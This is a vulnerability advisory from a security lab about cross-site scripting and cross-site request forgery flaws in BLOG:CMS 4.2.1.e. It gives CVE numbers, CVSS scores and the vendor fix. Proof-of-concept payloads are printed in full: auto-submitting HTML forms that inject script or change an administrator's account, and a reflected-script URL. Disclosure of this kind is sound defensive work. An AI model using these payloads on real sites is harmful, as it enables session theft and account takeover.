Total Tests:

Multiple Vulnerabilities in BLOG:CMS

Advisory ID:HTB22724
Product:BLOG:CMS
Vendor:Radek Hulán
Vulnerable Versions:4.2.1.e and probably prior
Tested Version:4.2.1.e
Advisory Publication:November 30, 2010 [without technical details]
Vendor Notification:November 30, 2010
Public Disclosure:December 14, 2010
Latest Update:December 13, 2010
Vulnerability Type:Cross-Site Scripting [CWE-79]
Cross-Site Scripting [CWE-79]
Cross-Site Request Forgery [CWE-352]
CVE References:CVE-2010-4749
CVE-2010-4750
Risk Level:Medium
CVSSv2 Base Scores:2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in BLOG:CMS which could be exploited to perform cross-site scripting, script insertion and cross-site request forgery attacks.

1) Cross-site scripting (XSS) vulnerabilities in BLOG:CMS: CVE-2010-4749
1.1 The vulnerability exists due to input sanitation error in the "amount" parameter in admin/index.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface.
Exploitation example:
<form action="http://host/admin/index.php" method="post" name="main">
<input type="hidden" name="blogid" value="0">
<input type="hidden" name="itemid" value="0">
<input type="hidden" name="action" value="browseowncomments">
<input type="hidden" name="amount" value='10"><script>alert(document.cookie)</script>'>
<input type="hidden" name="start" value="0">
<input type="hidden" name="search" value="">
</form>
<script>
document.main.submit();
</script>

1.2 The vulnerability exists due to input sanitation error in the "action" parameter in admin/index.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface.
Exploitation example:
http://host/admin/index.php?action=settingsedit"><script>alert(document.cook ie)</script>

2) Script insertion vulnerability in BLOG:CMS: CVE-2010-4749
Input passed to the "body" parameter in action.php when posting comments is not properly sanitized. A remote attacker can insert arbitrary HTML and script code, which will be executed in user`s browser in context of the vulnerable website when user views the malicious data.

3) Cross-site request forgery vulnerabilities in BLOG:CMS: CVE-2010-4750
The vulnerability exists due to insufficient validation of the request origin in admin/libs/admin.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change administrator`s credentials.
Exploitation example:
<form action="http://host/admin/index.php" method="post" name="main">
<input type="hidden" name="action" value="changemembersettings">
<input type="hidden" name="memberid" value="USER_UD">
<input type="hidden" name="name" value="tester">
<input type="hidden" name="realname" value="tester">
<input type="hidden" name="password" value="">
<input type="hidden" name="repeatpassword" value="">
<input type="hidden" name="email" value="email@example.com">
<input type="hidden" name="url" value="">
<input type="hidden" name="admin" value="1">
<input type="hidden" name="canlogin" value="1">
<input type="hidden" name="notes" value="">
<input type="hidden" name="deflang" value="">
</form>
<script>
document.main.submit();
</script>

How to Detect Cross-Site Scripting Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Upgrade to the most recent version


References:
[1] High-Tech Bridge Advisory HTB22724 - https://www.immuniweb.com/advisory/HTB22724 - Multiple Vulnerabilities in BLOG:CMS
[2] BLOG:CMS - blogcms.com - Blog:CMS (formerly Nucleus XE) is a content management system written in PHP with a MySQL database.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential